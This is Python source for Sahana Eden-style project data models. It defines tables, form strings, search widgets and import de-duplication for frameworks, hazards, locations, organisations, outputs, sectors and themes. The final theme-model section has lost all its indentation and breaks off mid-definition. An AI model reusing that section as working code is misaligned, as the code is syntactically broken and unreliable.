class S3ProjectFrameworkModel(S3Model):
    """
        Project Framework Model

        Policies & Strategies (frameworks) and the Organisations
        subscribing to them.
    """

    names = ["project_framework",
             "project_framework_organisation",
             ]

    def model(self):
        """
            Defines the project_framework table and its link table
            to Organisations
        """

        T = current.T
        db = current.db
        crud_strings = current.response.s3.crud_strings
        define_table = self.define_table
        messages = current.messages
        ORGANISATION = messages.ORGANISATION
        ORGANISATIONS = T("Organization(s)")

        # ---------------------------------------------------------------------
        # Project Frameworks
        #
        tablename = "project_framework"
        table = define_table(tablename,
                             self.super_link("doc_id", "doc_entity"),
                             Field("name",
                                   length=255,
                                   unique=True,
                                   label = T("Name"),
                                   ),
                             s3_comments("description",
                                         label = T("Description"),
                                         comment=None,
                                         ),
                             Field("time_frame",
                                   represent = lambda v: v or messages.NONE,
                                   label = T("Time Frame"),
                                   ),
                             *s3_meta_fields())

        # CRUD Strings
        # Mention approval in the created-message when record approval is active
        if current.deployment_settings.get_auth_record_approval():
            msg_record_created = T("Policy or Strategy added, awaiting administrator's approval")
        else:
            msg_record_created = T("Policy or Strategy added")
        crud_strings[tablename] = Storage(
            title_create = T("Add Policy or Strategy"),
            title_display = T("Policy or Strategy"),
            title_list = T("Policies & Strategies"),
            title_update = T("Edit Policy or Strategy"),
            title_search = T("Search Policies & Strategies"),
            title_upload = T("Import Policies & Strategies"),
            subtitle_create = T("Add New Policy or Strategy"),
            label_list_button = T("List Policies & Strategies"),
            label_create_button = T("Add Policy or Strategy"),
            msg_record_created = msg_record_created,
            msg_record_modified = T("Policy or Strategy updated"),
            msg_record_deleted = T("Policy or Strategy deleted"),
            msg_list_empty = T("No Policies or Strategies found")
        )

        crud_form = S3SQLCustomForm(
            "name",
            S3SQLInlineComponent(
                "framework_organisation",
                label = ORGANISATIONS,
                fields = ["organisation_id"],
            ),
            "description",
            "time_frame",
            S3SQLInlineComponent(
                "document",
                label = T("Files"),
                fields = ["file"],
                # Show only records with a non-empty file
                filterby = dict(field = "file",
                                options = "",
                                invert = True,
                                )
            ),
        )

        #  search_method = S3Search(simple = S3SearchSimpleWidget(
        #     name = "project_framework_search_text",
        #     label = T("Name"),
        #     comment = T("Search for a Policy or Strategy by name or description."),
        #     field = ["name",
        #              "description",
        #              ]
        #     ))

        self.configure(tablename,
                       super_entity="doc_entity",
                       crud_form = crud_form,
                       #search_method = search_method,
                       list_fields = ["name",
                                      (ORGANISATIONS, "framework_organisation.organisation_id"),
                                      "description",
                                      "time_frame",
                                      (T("Files"), "document.file"),
                                      ]
                       )

        represent = S3Represent(lookup=tablename)
        framework_id = S3ReusableField("framework_id", table,
                                       # NOTE(review): label is ORGANISATION although
                                       # this FK references a framework — verify intent
                                       label = ORGANISATION,
                                       requires = IS_NULL_OR(
                                                    IS_ONE_OF(db, "project_framework.id",
                                                              represent
                                                              )),
                                       represent = represent,
                                       ondelete = "CASCADE",
                                       )

        self.add_component("project_framework_organisation",
                           project_framework="framework_id")

        # ---------------------------------------------------------------------
        # Project Framework Organisations
        #
        tablename = "project_framework_organisation"
        define_table(tablename,
                     framework_id(),
                     self.org_organisation_id(),
                     *s3_meta_fields()
                     )

        # CRUD Strings
        crud_strings[tablename] = Storage(
            title_create = T("New Organization"),
            title_display = ORGANISATION,
            title_list = T("Organizations"),
            title_update = T("Edit Organization"),
            title_search = T("Search Organizations"),
            subtitle_create = T("Add New Organization"),
            label_list_button = T("List Organizations"),
            label_create_button = T("Add Organization"),
            msg_record_created = T("Organization added to Policy/Strategy"),
            msg_record_modified = T("Organization updated"),
            msg_record_deleted = T("Organization removed from Policy/Strategy"),
            msg_list_empty = T("No Organizations found for this Policy/Strategy")
        )

        # Pass names back to global scope (s3.*)
        # (nothing to export from this model)
        return dict()
# =============================================================================
class S3ProjectHazardModel(S3Model):
    """
        Project Hazard Model
        - a lookup table of hazard types and a link table tagging
          projects with hazards
    """

    # Names exported to s3db by this model
    names = ["project_hazard",
             "project_hazard_project",
             ]

    def model(self):
        """
            Define the project_hazard lookup table and the
            project_hazard_project link table (Projects <> Hazards),
            including their CRUD strings and de-duplication config.
        """

        T = current.T
        db = current.db
        crud_strings = current.response.s3.crud_strings
        define_table = self.define_table
        NONE = current.messages["NONE"]

        # ---------------------------------------------------------------------
        # Hazard
        #
        tablename = "project_hazard"
        table = define_table(tablename,
                             Field("name",
                                   length=128,
                                   notnull=True,
                                   unique=True,
                                   label=T("Name"),
                                   # Pass stored names through T() so hazard
                                   # names can be localized at display time
                                   represent=lambda v: T(v) if v is not None \
                                                            else NONE,
                                   ),
                             s3_comments(),
                             *s3_meta_fields())

        # CRUD Strings
        ADD_HAZARD = T("Add Hazard")
        crud_strings[tablename] = Storage(
            title_create = ADD_HAZARD,
            title_display = T("Hazard Details"),
            title_list = T("Hazards"),
            title_update = T("Edit Hazard"),
            title_upload = T("Import Hazards"),
            subtitle_create = T("Add New Hazard"),
            label_list_button = T("List Hazards"),
            label_create_button = ADD_HAZARD,
            label_delete_button = T("Delete Hazard"),
            msg_record_created = T("Hazard added"),
            msg_record_modified = T("Hazard updated"),
            msg_record_deleted = T("Hazard deleted"),
            msg_list_empty = T("No Hazards currently registered"))

        # Reusable Field
        # translate=True: hazard names are shown localized (see represent above)
        represent = S3Represent(lookup=tablename, translate=True)
        hazard_id = S3ReusableField("hazard_id", table,
                                    sortby = "name",
                                    label = T("Hazards"),
                                    requires = IS_NULL_OR(
                                                IS_ONE_OF(db, "project_hazard.id",
                                                          represent,
                                                          sort=True)),
                                    represent = represent,
                                    ondelete = "CASCADE",
                                    )

        # Field settings for project_project.hazard field in friendly_string_from_field_query function
        # - breaks Action Buttons, so moved to inside the fn which calls them
        #table.id.represent = represent
        #table.id.label = T("Hazard")

        # ---------------------------------------------------------------------
        # Projects <> Hazards Link Table
        #
        tablename = "project_hazard_project"
        define_table(tablename,
                     hazard_id(),
                     self.project_project_id(),
                     *s3_meta_fields()
                     )

        # CRUD Strings
        crud_strings[tablename] = Storage(
            title_create = T("New Hazard"),
            title_display = T("Hazard"),
            title_list = T("Hazards"),
            title_update = T("Edit Hazard"),
            title_search = T("Search Hazards"),
            title_upload = T("Import Hazard data"),
            subtitle_create = T("Add New Hazard"),
            label_list_button = T("List Hazards"),
            label_create_button = T("Add Hazard to Project"),
            msg_record_created = T("Hazard added to Project"),
            msg_record_modified = T("Hazard updated"),
            msg_record_deleted = T("Hazard removed from Project"),
            msg_list_empty = T("No Hazards found for this Project"))

        self.configure(tablename,
                       deduplicate=self.project_hazard_project_deduplicate,
                       )

        # Pass names back to global scope (s3.*)
        return dict()

    # -------------------------------------------------------------------------
    @staticmethod
    def project_hazard_project_deduplicate(item):
        """
            Import item de-duplication

            Treats a (project_id, hazard_id) pair as the natural key:
            if a link row with the same pair exists, the import item
            becomes an UPDATE of that row instead of a new INSERT.
        """

        if item.tablename != "project_hazard_project":
            return

        data = item.data
        if "project_id" in data and \
           "hazard_id" in data:
            project_id = data.project_id
            hazard_id = data.hazard_id
            table = item.table
            query = (table.project_id == project_id) & \
                    (table.hazard_id == hazard_id)
            duplicate = current.db(query).select(table.id,
                                                 limitby=(0, 1)).first()
            if duplicate:
                item.id = duplicate.id
                item.method = item.METHOD.UPDATE
        return
# =============================================================================
class S3ProjectLocationModel(S3Model):
    """
        Project Location Model
        - these can simply be ways to display a Project on the Map
          or these can be 'Communities'
    """

    # Names exported to s3db by this model
    names = ["project_location",
             "project_location_id",
             "project_location_contact",
             "project_location_represent",
             ]

    def model(self):
        """
            Define the project_location table (a Project at a Location,
            optionally styled as a 'Community' via deployment settings)
            and the project_location_contact table (contact persons for
            a location), with search, report and component configuration.
        """

        T = current.T
        db = current.db
        settings = current.deployment_settings
        # Whether locations are presented to users as 'Communities'
        community = settings.get_project_community()
        messages = current.messages
        NONE = messages["NONE"]
        COUNTRY = messages.COUNTRY

        add_component = self.add_component
        configure = self.configure
        crud_strings = current.response.s3.crud_strings
        define_table = self.define_table

        # ---------------------------------------------------------------------
        # Project Location ('Community')
        #
        tablename = "project_location"
        table = define_table(tablename,
                             self.super_link("doc_id", "doc_entity"),
                             # Populated onaccept - used for map popups
                             Field("name",
                                   writable=False),
                             self.project_project_id(),
                             self.gis_location_id(
                                widget = S3LocationAutocompleteWidget(),
                                requires = IS_LOCATION(),
                                represent = self.gis_LocationRepresent(sep=", "),
                                comment = S3AddResourceLink(c="gis",
                                                            f="location",
                                                            label = T("Add Location"),
                                                            title=T("Location"),
                                                            tooltip=T("Enter some characters to bring up a list of possible matches")),
                                ),
                             # % breakdown by location
                             # (stored as a fraction 0..1, not 0..100)
                             Field("percentage", "decimal(3,2)",
                                   label = T("Percentage"),
                                   default = 0,
                                   requires = IS_DECIMAL_IN_RANGE(0, 1),
                                   ),
                             s3_comments(),
                             *s3_meta_fields())

        # CRUD Strings
        # - terminology switches between 'Community' & 'Location'
        #   depending on the deployment setting
        if community:
            LOCATION = T("Community")
            LOCATION_TOOLTIP = T("If you don't see the community in the list, you can add a new one by clicking link 'Add Community'.")
            ADD_LOCATION = T("Add Community")
            crud_strings[tablename] = Storage(
                    title_create = ADD_LOCATION,
                    title_display = T("Community Details"),
                    title_list = T("Communities"),
                    title_update = T("Edit Community Details"),
                    title_search = T("Search Communities"),
                    title_upload = T("Import Community Data"),
                    title_report = T("3W Report"),
                    title_map = T("Map of Communities"),
                    subtitle_create = T("Add New Community"),
                    label_list_button = T("List Communities"),
                    label_create_button = ADD_LOCATION,
                    msg_record_created = T("Community Added"),
                    msg_record_modified = T("Community Updated"),
                    msg_record_deleted = T("Community Deleted"),
                    msg_list_empty = T("No Communities Found")
            )
        else:
            LOCATION = T("Location")
            LOCATION_TOOLTIP = T("If you don't see the location in the list, you can add a new one by clicking link 'Add Location'.")
            ADD_LOCATION = T("Add Location")
            crud_strings[tablename] = Storage(
                    title_create = ADD_LOCATION,
                    title_display = T("Location Details"),
                    title_list = T("Locations"),
                    title_update = T("Edit Location Details"),
                    title_search = T("Search Location"),
                    title_upload = T("Import Location Data"),
                    title_report = T("3W Report"),
                    title_map = T("Map of Projects"),
                    subtitle_create = T("Add New Location"),
                    label_list_button = T("List Locations"),
                    label_create_button = ADD_LOCATION,
                    msg_record_created = T("Location Added"),
                    msg_record_modified = T("Location updated"),
                    msg_record_deleted = T("Location Deleted"),
                    msg_list_empty = T("No Locations Found")
            )

        # Search Method
        if community:
            simple = S3SearchSimpleWidget(
                name = "project_location_search_text",
                label = T("Name"),
                comment = T("Search for a Project Community by name."),
                field = ["location_id$L0",
                         "location_id$L1",
                         "location_id$L2",
                         "location_id$L3",
                         "location_id$L4",
                         #"location_id$L5",
                         ]
                )
        else:
            simple = S3SearchSimpleWidget(
                name = "project_location_search_text",
                label = T("Text"),
                comment = T("Search for a Project by name, code, location, or description."),
                field = ["location_id$L0",
                         "location_id$L1",
                         "location_id$L2",
                         "location_id$L3",
                         "location_id$L4",
                         #"location_id$L5",
                         "project_id$name",
                         "project_id$code",
                         "project_id$description",
                         ]
                )

        advanced_search = [
            simple,
            # This is only suitable for deployments with a few projects
            #S3SearchOptionsWidget(
            #    name = "project_location_search_project",
            #    label = T("Project"),
            #    field = "project_id",
            #    cols = 3
            #),
            S3SearchOptionsWidget(
                name = "project_location_search_theme",
                label = T("Theme"),
                field = "project_id$theme_project.theme_id",
                options = self.project_theme_opts,
                cols = 1,
            ),
            S3SearchOptionsWidget(
                name = "project_location_search_L0",
                field = "location_id$L0",
                label = COUNTRY,
                cols = 3
            ),
            S3SearchOptionsWidget(
                name = "project_location_search_L1",
                field = "location_id$L1",
                location_level = "L1",
                cols = 3
            ),
            S3SearchOptionsWidget(
                name = "project_location_search_L2",
                field = "location_id$L2",
                location_level = "L2",
                cols = 3
            ),
            S3SearchOptionsWidget(
                name = "project_location_search_L3",
                field = "location_id$L3",
                location_level = "L3",
                cols = 3
            )
        ]

        if settings.get_project_sectors():
            sectors = S3SearchOptionsWidget(
                name = "project_location_search_sector",
                label = T("Sector"),
                field = "project_id$sector.name",
                cols = 3
            )
            # Insert right after the simple text widget
            advanced_search.insert(1, sectors)

        search_method = S3Search(
            simple = (simple),
            advanced = advanced_search,
        )

        # Resource Configuration
        report_fields = [(COUNTRY, "location_id$L0"),
                         "location_id$L1",
                         "location_id$L2",
                         "location_id$L3",
                         "location_id$L4",
                         (messages.ORGANISATION, "project_id$organisation_id"),
                         (T("Project"), "project_id"),
                         (T("Activity Types"), "activity_type.activity_type_id"),
                         ]
        list_fields = ["location_id",
                       (COUNTRY, "location_id$L0"),
                       "location_id$L1",
                       "location_id$L2",
                       "location_id$L3",
                       "location_id$L4",
                       "project_id",
                       ]
        # Themes & Activity Types are alternatives, depending on settings
        if settings.get_project_theme_percentages():
            list_fields.append((T("Themes"), "project_id$theme_project.theme_id"))
        else:
            list_fields.append((T("Activity Types"), "activity_type.activity_type_id"))
        list_fields.append("comments")

        configure(tablename,
                  super_entity="doc_entity",
                  # After create, go straight to adding beneficiaries
                  create_next=URL(c="project", f="location",
                                  args=["[id]", "beneficiary"]),
                  deduplicate=self.project_location_deduplicate,
                  onaccept=self.project_location_onaccept,
                  search_method=search_method,
                  report_options=Storage(search = advanced_search,
                                         rows=report_fields,
                                         cols=report_fields,
                                         fact=report_fields,
                                         defaults=Storage(rows="location.location_id$L1",
                                                          cols="location.project_id",
                                                          fact="activity_type.activity_type_id",
                                                          aggregate="list",
                                                          totals=True
                                                          )
                                         ),
                  list_fields = list_fields,
                  )

        # Reusable Field
        project_location_represent = project_LocationRepresent()
        project_location_id = S3ReusableField("project_location_id", table,
            # Restrict choices to records the user can update
            requires = IS_NULL_OR(
                        IS_ONE_OF(db(current.auth.s3_accessible_query("update",
                                                                      table)),
                                  "project_location.id",
                                  project_location_represent,
                                  sort=True)),
            represent = project_location_represent,
            label = LOCATION,
            comment = S3AddResourceLink(ADD_LOCATION,
                                        c="project", f="location",
                                        tooltip=LOCATION_TOOLTIP),
            ondelete = "CASCADE"
            )

        # Components
        # Activity Types
        add_component("project_activity_type",
                      project_location=dict(
                                link="project_activity_type_location",
                                joinby="project_location_id",
                                key="activity_type_id",
                                actuate="hide"))

        # Beneficiaries
        add_component("project_beneficiary",
                      project_location="project_location_id")

        # Contacts
        add_component("pr_person",
                      project_location=dict(
                            name="contact",
                            link="project_location_contact",
                            joinby="project_location_id",
                            key="person_id",
                            actuate="hide",
                            autodelete=False))

        # Distributions
        add_component("supply_distribution",
                      project_location="project_location_id")

        # Themes
        add_component("project_theme",
                      project_location=dict(
                                link="project_theme_location",
                                joinby="project_location_id",
                                key="theme_id",
                                actuate="hide"))

        # ---------------------------------------------------------------------
        # Project Community Contact Person
        #
        tablename = "project_location_contact"
        table = define_table(tablename,
                             project_location_id(),
                             self.pr_person_id(
                                widget=S3AddPersonWidget(controller="pr"),
                                requires=IS_ADD_PERSON_WIDGET(),
                                comment=None
                                ),
                             *s3_meta_fields())

        # CRUD Strings
        ADD_CONTACT = T("Add Contact")
        # NOTE(review): LIST_OF_CONTACTS is not referenced within this model
        LIST_OF_CONTACTS = T("Community Contacts")
        crud_strings[tablename] = Storage(
            title_create = ADD_CONTACT,
            title_display = T("Contact Details"),
            title_list = T("Contacts"),
            title_update = T("Edit Contact Details"),
            title_search = T("Search Contacts"),
            subtitle_create = T("Add New Contact"),
            label_list_button = T("List Contacts"),
            label_create_button = ADD_CONTACT,
            msg_record_created = T("Contact Added"),
            msg_record_modified = T("Contact Updated"),
            msg_record_deleted = T("Contact Deleted"),
            msg_list_empty = T("No Contacts Found"))

        # Components
        # - pr_contact rows reached via the person's pe_id, filtered by
        #   contact method (email / SMS)
        # Email
        add_component("pr_contact",
                      project_location_contact=dict(
                        name="email",
                        link="pr_person",
                        joinby="id",
                        key="pe_id",
                        fkey="pe_id",
                        pkey="person_id",
                        filterby="contact_method",
                        filterfor=["EMAIL"],
                      ))
        # Mobile Phone
        add_component("pr_contact",
                      project_location_contact=dict(
                        name="phone",
                        link="pr_person",
                        joinby="id",
                        key="pe_id",
                        fkey="pe_id",
                        pkey="person_id",
                        filterby="contact_method",
                        filterfor=["SMS"],
                      ))

        contact_search_method = S3Search(
            advanced=(S3SearchSimpleWidget(
                            name = "location_contact_search_simple",
                            label = T("Name"),
                            comment = T("You can search by person name - enter any of the first, middle or last names, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons."),
                            field = ["person_id$first_name",
                                     "person_id$middle_name",
                                     "person_id$last_name"
                                    ]
                        ),
                        S3SearchOptionsWidget(
                            name="location_contact_search_L1",
                            field="project_location_id$location_id$L1",
                            location_level="L1",
                            cols = 3,
                        ),
                        S3SearchOptionsWidget(
                            name="location_contact_search_L2",
                            field="project_location_id$location_id$L2",
                            location_level="L2",
                            cols = 3,
                        )
                    ))

        # Resource configuration
        configure(tablename,
                  search_method=contact_search_method,
                  list_fields=["person_id",
                               (T("Email"), "email.value"),
                               (T("Mobile Phone"), "phone.value"),
                               "project_location_id",
                               (T("Project"), "project_location_id$project_id"),
                               ])

        # ---------------------------------------------------------------------
        # Pass names back to global scope (s3.*)
        #
        return dict(project_location_id = project_location_id,
                    project_location_represent = project_location_represent,
                    )

    # -------------------------------------------------------------------------
    def defaults(self):
        """ Safe defaults for model-global names if module is disabled """

        # Unreadable/unwritable dummy stands in for project_location_id
        dummy = S3ReusableField("dummy_id", "integer",
                                readable=False,
                                writable=False)

        return dict(project_location_id = lambda **attr: dummy("project_location_id"),
                    )

    # -------------------------------------------------------------------------
    @staticmethod
    def project_location_onaccept(form):
        """
            Calculate the 'name' field used by Map popups

            Uses the form vars directly when both location_id & project_id
            are present (avoids a DB read), otherwise looks the record up
            by id. The result is truncated to fit the 512-char column.
        """

        vars = form.vars
        id = vars.id
        if vars.location_id and vars.project_id:
            name = current.s3db.project_location_represent(None, vars)
        elif id:
            name = current.s3db.project_location_represent(id)
        else:
            return None
        if len(name) > 512:
            # Ensure we don't break limits of SQL field
            name = name[:509] + "..."
        db = current.db
        # NOTE(review): if the first branch ran with vars.id absent,
        # this update matches no rows - confirm callers always supply id
        db(db.project_location.id == id).update(name=name)

    # -------------------------------------------------------------------------
    @staticmethod
    def project_location_deduplicate(item):
        """
            Import item de-duplication

            Natural key is the (project_id, location_id) pair: an existing
            row with the same pair turns the import into an UPDATE.
        """

        if item.tablename != "project_location":
            return

        data = item.data
        if "project_id" in data and \
           "location_id" in data:
            project_id = data.project_id
            location_id = data.location_id
            table = item.table
            query = (table.project_id == project_id) & \
                    (table.location_id == location_id)
            duplicate = current.db(query).select(table.id,
                                                 limitby=(0, 1)).first()

            if duplicate:
                item.id = duplicate.id
                item.method = item.METHOD.UPDATE
        return
# =============================================================================
class S3ProjectOrganisationModel(S3Model):
    """
        Project Organisation Model
        - link table of Organisations participating in a Project with a
          role (e.g. Lead Implementer, Partner, Donor) and funding amount
    """

    # Names exported to s3db by this model
    names = ["project_organisation"]

    def model(self):
        """
            Define the project_organisation link table, its CRUD strings,
            report options and lifecycle callbacks (lead-role bookkeeping).
        """

        T = current.T
        messages = current.messages
        NONE = messages["NONE"]

        # ---------------------------------------------------------------------
        # Project Organisations
        # for multi_orgs=True
        #
        # Role options (int -> label) come from deployment settings
        project_organisation_roles = current.deployment_settings.get_project_organisation_roles()

        organisation_help = T("Add all organizations which are involved in different roles in this project")

        tablename = "project_organisation"
        table = self.define_table(tablename,
                                  self.project_project_id(),
                                  self.org_organisation_id(
                                  requires = self.org_organisation_requires(
                                                required=True,
                                                # Need to be able to add Partners/Donors not just Lead org
                                                #updateable=True,
                                                ),
                                  widget = None,
                                  comment=S3AddResourceLink(c="org",
                                                            f="organisation",
                                                            label=T("Add Organization"),
                                                            title=messages.ORGANISATION,
                                                            tooltip=organisation_help)
                                  ),
                                  Field("role", "integer",
                                        label = T("Role"),
                                        requires = IS_NULL_OR(
                                                     IS_IN_SET(project_organisation_roles)
                                                   ),
                                        represent = lambda opt: \
                                            project_organisation_roles.get(opt,
                                                                           NONE)),
                                  Field("amount", "double",
                                        requires = IS_NULL_OR(
                                                     IS_FLOAT_AMOUNT()),
                                        represent = lambda v: \
                                            IS_FLOAT_AMOUNT.represent(v, precision=2),
                                        widget = IS_FLOAT_AMOUNT.widget,
                                        label = T("Funds Contributed")),
                                  s3_currency(),
                                  s3_comments(),
                                  *s3_meta_fields())

        # CRUD Strings
        ADD_PROJECT_ORG = T("Add Organization to Project")
        current.response.s3.crud_strings[tablename] = Storage(
            title_create = ADD_PROJECT_ORG,
            title_display = T("Project Organization Details"),
            title_list = T("Project Organizations"),
            title_update = T("Edit Project Organization"),
            title_search = T("Search Project Organizations"),
            title_upload = T("Import Project Organizations"),
            title_report = T("Funding Report"),
            subtitle_create = T("Add Organization to Project"),
            label_list_button = T("List Project Organizations"),
            label_create_button = ADD_PROJECT_ORG,
            label_delete_button = T("Remove Organization from Project"),
            msg_record_created = T("Organization added to Project"),
            msg_record_modified = T("Project Organization updated"),
            msg_record_deleted = T("Organization removed from Project"),
            msg_list_empty = T("No Organizations for Project(s)"))

        # Report Options
        report_fields = ["project_id",
                         "organisation_id",
                         "role",
                         "amount",
                         "currency",
                         ]
        report_options = Storage(rows = report_fields,
                                 cols = report_fields,
                                 fact = report_fields,
                                 #methods = ["sum"],
                                 defaults = Storage(rows = "organisation.organisation_id",
                                                    cols = "organisation.currency",
                                                    fact = "organisation.amount",
                                                    aggregate = "sum",
                                                    totals = False
                                                    )
                                 )

        # Resource Configuration
        self.configure(tablename,
                       report_options = report_options,
                       deduplicate=self.project_organisation_deduplicate,
                       onvalidation=self.project_organisation_onvalidation,
                       onaccept=self.project_organisation_onaccept,
                       ondelete=self.project_organisation_ondelete,
                       )

        # Pass names back to global scope (s3.*)
        return dict()

    # -------------------------------------------------------------------------
    @staticmethod
    def project_organisation_onvalidation(form, lead_role=None):
        """
            Form validation

            Rejects the submission if another organisation already holds
            the lead role for this project.

            @param lead_role: role code for the lead implementer;
                              defaults to the deployment setting
        """

        if lead_role is None:
            lead_role = current.deployment_settings.get_project_organisation_lead_role()

        vars = form.vars
        project_id = vars.project_id
        organisation_id = vars.organisation_id
        if str(vars.role) == str(lead_role) and project_id:
            db = current.db
            otable = db.project_organisation
            query = (otable.deleted != True) & \
                    (otable.project_id == project_id) & \
                    (otable.role == lead_role) & \
                    (otable.organisation_id != organisation_id)
            row = db(query).select(otable.id,
                                   limitby=(0, 1)).first()
            if row:
                form.errors.role = \
                    current.T("Lead Implementer for this project is already set, please choose another role.")
        return

    # -------------------------------------------------------------------------
    @staticmethod
    def project_organisation_onaccept(form):
        """
            Record creation post-processing

            If the added organisation is the lead role, set the
            project.organisation to point to the same organisation
            & update the realm_entity.
        """

        vars = form.vars

        if str(vars.role) == \
             str(current.deployment_settings.get_project_organisation_lead_role()):

            # Read the record
            # (safer than relying on vars which might be missing on component tabs)
            db = current.db
            ltable = db.project_organisation
            record = db(ltable.id == vars.id).select(ltable.project_id,
                                                     ltable.organisation_id,
                                                     limitby=(0, 1)
                                                     ).first()
            # NOTE(review): record is assumed to exist here (we are in
            # onaccept of the same table) - confirm no race with deletes

            # Set the Project's organisation_id to the new lead organisation
            organisation_id = record.organisation_id
            ptable = db.project_project
            db(ptable.id == record.project_id).update(
                                            organisation_id = organisation_id,
                                            realm_entity = \
                                                current.s3db.pr_get_pe_id("org_organisation",
                                                                          organisation_id)
                                            )

    # -------------------------------------------------------------------------
    @staticmethod
    def project_organisation_ondelete(row):
        """
            Executed when a project organisation record is deleted.

            If the deleted organisation is the lead role on this project,
            set the project organisation to None.
        """

        db = current.db
        potable = db.project_organisation
        ptable = db.project_project
        query = (potable.id == row.get("id"))
        deleted_row = db(query).select(potable.deleted_fk,
                                       potable.role,
                                       limitby=(0, 1)).first()

        if str(deleted_row.role) == \
           str(current.deployment_settings.get_project_organisation_lead_role()):
            # Get the project_id
            # deleted_fk holds the former FK values as a JSON string
            # (requires 'json' to be available at module level)
            deleted_fk = json.loads(deleted_row.deleted_fk)
            project_id = deleted_fk["project_id"]

            # Set the project organisation_id to NULL (using None)
            db(ptable.id == project_id).update(organisation_id=None)

        return

    # ---------------------------------------------------------------------
    @staticmethod
    def project_organisation_deduplicate(item):
        """
            Import item de-duplication

            Natural key is the (project_id, organisation_id) pair.
        """

        if item.tablename != "project_organisation":
            return
        data = item.data
        if "project_id" in data and \
           "organisation_id" in data:
            table = item.table
            project_id = data.project_id
            organisation_id = data.organisation_id
            query = (table.project_id == project_id) & \
                    (table.organisation_id == organisation_id)
            duplicate = current.db(query).select(table.id,
                                                 limitby=(0, 1)).first()
            if duplicate:
                item.id = duplicate.id
                item.method = item.METHOD.UPDATE
        return
# =============================================================================
class S3ProjectOutputModel(S3Model):
    """
        Project Output Model
        - free-text outputs (with a status) attached to a Project
    """

    # Names exported to s3db by this model
    names = ["project_output"]

    def model(self):
        """
            Define the project_output table, its CRUD strings and
            de-duplication configuration.
        """

        T = current.T
        db = current.db

        NONE = current.messages["NONE"]

        # ---------------------------------------------------------------------
        # Outputs
        #
        tablename = "project_output"
        self.define_table(tablename,
                          self.project_project_id(
                            # Override requires so that update access to the projects isn't required
                            requires = IS_ONE_OF(db, "project_project.id",
                                                 self.project_project_represent
                                                 )
                            ),
                          Field("name",
                                represent = lambda v: v or NONE,
                                label = T("Output")),
                          Field("status",
                                represent = lambda v: v or NONE,
                                label = T("Status")),
                          *s3_meta_fields())

        # CRUD Strings
        current.response.s3.crud_strings[tablename] = Storage(
            title_create = T("New Output"),
            title_display = T("Output"),
            title_list = T("Outputs"),
            title_update = T("Edit Output"),
            subtitle_create = T("Add New Output"),
            label_list_button = T("List Outputs"),
            label_create_button = T("New Output"),
            msg_record_created = T("Output added"),
            msg_record_modified = T("Output updated"),
            msg_record_deleted = T("Output removed"),
            msg_list_empty = T("No outputs found")
        )

        self.configure(tablename,
                       deduplicate = self.project_output_deduplicate,
                       )

        # Pass names back to global scope (s3.*)
        return dict()

    # -------------------------------------------------------------------------
    @staticmethod
    def project_output_deduplicate(item):
        """
            Import item de-duplication

            Matches on name; when a project_id is supplied, also accepts
            an existing row with the same name & no project as a duplicate.
        """

        if item.tablename != "project_output":
            return
        data = item.data
        name = data.get("name", None)
        project_id = data.get("project_id", None)
        if name:
            table = item.table
            query = (table.name == name)
            if project_id:
                query &= ((table.project_id == project_id) | \
                          (table.project_id == None))

            duplicate = current.db(query).select(table.id,
                                                 limitby=(0, 1)).first()
            if duplicate:
                item.id = duplicate.id
                item.method = item.METHOD.UPDATE
# =============================================================================
class S3ProjectSectorModel(S3Model):
    """
        Project Sector Model
        - link table tagging Projects with Sectors
    """

    # Names exported to s3db by this model
    names = ["project_sector_project"]

    def model(self):
        """
            Define the project_sector_project link table
            (Projects <> Sectors) and its CRUD strings.
        """

        T = current.T
        define_table = self.define_table

        # ---------------------------------------------------------------------
        # Projects <> Sectors Link Table
        #
        tablename = "project_sector_project"
        define_table(tablename,
                     self.org_sector_id(empty=False),
                     self.project_project_id(empty=False),
                     *s3_meta_fields())

        # CRUD Strings
        crud_strings = Storage(
            title_create = T("New Sector"),
            title_display = T("Sector"),
            title_list = T("Sectors"),
            title_update = T("Edit Sector"),
            title_search = T("Search Sectors"),
            title_upload = T("Import Sector data"),
            subtitle_create = T("Add New Sector"),
            label_list_button = T("List Sectors"),
            label_create_button = T("Add Sector to Project"),
            msg_record_created = T("Sector added to Project"),
            msg_record_modified = T("Sector updated"),
            msg_record_deleted = T("Sector removed from Project"),
            msg_list_empty = T("No Sectors found for this Project")
        )
        current.response.s3.crud_strings[tablename] = crud_strings

        # Pass names back to global scope (s3.*)
        return dict()
# =============================================================================
class S3ProjectThemeModel(S3Model):
"""
Project Theme Model
"""
names = ["project_theme",
"project_theme_id",
"project_theme_sector",
"project_theme_project",
"project_theme_location",
]
def model(self):
T = current.T
db = current.db
add_component = self.add_component
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
theme_percentages = current.deployment_settings.get_project_theme_percentages()
NONE = current.messages["NONE"]
# ---------------------------------------------------------------------
# Themes
#
tablename = "project_theme"
table = define_table(tablename,
Field("name",
length=128,
notnull=True,
unique=True,
label=T("Name"),
represent=lambda v: T(v) if v is not None \
else NONE,
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_THEME = T("Add Theme")
crud_strings[tablename] = Storage(
title_create = ADD_THEME,
title_display = T("Theme Details"),
title_list = T("Themes"),
title_update = T("Edit Theme"),
#title_upload = T("Import Themes"),
subtitle_create = T("Add New Theme"),
label_list_button = T("List Themes"),
label_create_button = ADD_THEME,
label_delete_button = T("Delete Theme"),
msg_record_created = T("Theme added"),
msg_record_modified = T("Theme updated"),
msg_record_deleted = T("Theme deleted"),
msg_list_empty = T("No Themes currently registered"))
# Reusable Field
represent = S3Represent(lookup=tablename, translate=True)
theme_id = S3ReusableField("theme_id", table,
label = T("Theme"),
sortby = "name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_theme.id",
represent,
sort=True)),
represent = represent,
ondelete = "CASCADE")
# Field settings for project_project.theme field in friendly_string_from_field_query function
# - breaks Action Buttons, so moved to inside the fn which calls them
#table.id.represent = represent
#table.id.label = T("Theme")
# Components
add_component("project_theme_project", project_theme="theme_id")
add_component("project_theme_sector", project_theme="theme_id")
# For Sync Filter
add_component("org_sector",
project_theme=Storage(link="project_theme_sector",
joinby="theme_id",
key="sector_id"))
crud_form = S3SQLCustomForm(
"name",
# Project Sectors
S3SQLInlineComponent(
"theme_sector",
label=T("Sectors to which this Theme can apply"),
fields=["sector_id"],
),
"comments"
)
configure(tablename,
crud_form=crud_form,
list_fields=["id",
"name",
(T("Sectors"), "theme_sector.sector_id"),
"comments",
])
# ---------------------------------------------------------------------
# Theme - Sector Link Table
#
tablename = "project_theme_sector"
